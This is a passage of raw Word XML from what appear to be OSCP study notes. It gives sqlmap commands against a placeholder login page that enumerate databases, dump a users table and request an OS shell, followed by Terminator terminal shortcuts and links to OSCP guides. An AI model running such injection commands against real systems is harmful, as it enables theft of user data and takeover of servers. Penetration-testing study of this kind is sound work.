          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="073C9CEB" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>List all tables in a specific database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C97BF" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>site_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A365E74" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Dump the contents of a DB table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D2650D" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>site_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA78932" w14:textId="77715DD7" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dump a table from a database when you have admin credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6FD60" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> –method </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> –data </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>admin&amp;submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>=Submit"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>social_mccodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD63C2D" w14:textId="77777777" w:rsidR="005570D7" w:rsidRPr="005570D7" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Get OS Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2A07A" w14:textId="44B3B800" w:rsidR="00FC4479" w:rsidRDefault="005570D7" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"http://testsite.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="11AA11"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005570D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA6B24A" w14:textId="77777777" w:rsidR="0018435B" w:rsidRDefault="0018435B" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5866752E" w14:textId="0B449B67" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="00FC4479">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Terminator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A6CDF" w14:textId="59C68564" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Win + </w:t>
      </w:r>
      <w:r w:rsidR="00912D81">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create new terminal </w:t>
      </w:r>
      <w:r w:rsidR="00912D81">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F9ABF" w14:textId="40AB601A" w:rsidR="00912D81" w:rsidRDefault="00912D81" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Win + d to create new terminal right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254F6D0" w14:textId="18BCFC19" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Alt + direction to move between then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520151D" w14:textId="36A77C1B" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Ctrl + shift + w to close terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250FB16" w14:textId="5C8BE63D" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Ctrl + alt + w to rename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720ECCC7" w14:textId="0B2B76D4" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Ctrl + arrow keys to move word by word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA6A06" w14:textId="7F5AB62B" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Alt + backspace to delete word by word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B95BE" w14:textId="1721FA4E" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Home and end to go to front and back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8C4D1E" w14:textId="6396D5D5" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ctrl + u to delete entire line from cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C963953" w14:textId="02D52534" w:rsidR="007C5EC6" w:rsidRDefault="007C5EC6" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Ctrl + r to search history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600DFC6" w14:textId="300F1367" w:rsidR="00230716" w:rsidRDefault="00230716" w:rsidP="007C5EC6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Ctrl + alt + d to see and unsee desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B87DCE" w14:textId="42A72B9C" w:rsidR="00C70BBF" w:rsidRPr="00063C99" w:rsidRDefault="00230716" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + shift + x to focus and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>unfocus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B905D25" w14:textId="0D3AF536" w:rsidR="00C70BBF" w:rsidRDefault="00C70BBF" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DDCA99" w14:textId="3CB208FA" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150F3DE8" w14:textId="2D58B8D0" w:rsidR="008E21C2" w:rsidRDefault="00034E76" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="008E21C2" w:rsidRPr="00D13274">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>https://forum.hackthebox.com/t/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt/1471</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41E3D0EA" w14:textId="3FB6DEAD" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658967E4" w14:textId="60221A5B" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E21C2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html#enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE5A0E" w14:textId="30C1CE10" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160B02C6" w14:textId="75D10015" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E21C2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>https://www.linkedin.com/pulse/oscp-essentials-ernesto-arias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD9B8D" w14:textId="5AD52CC3" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F232C0D" w14:textId="72160C03" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
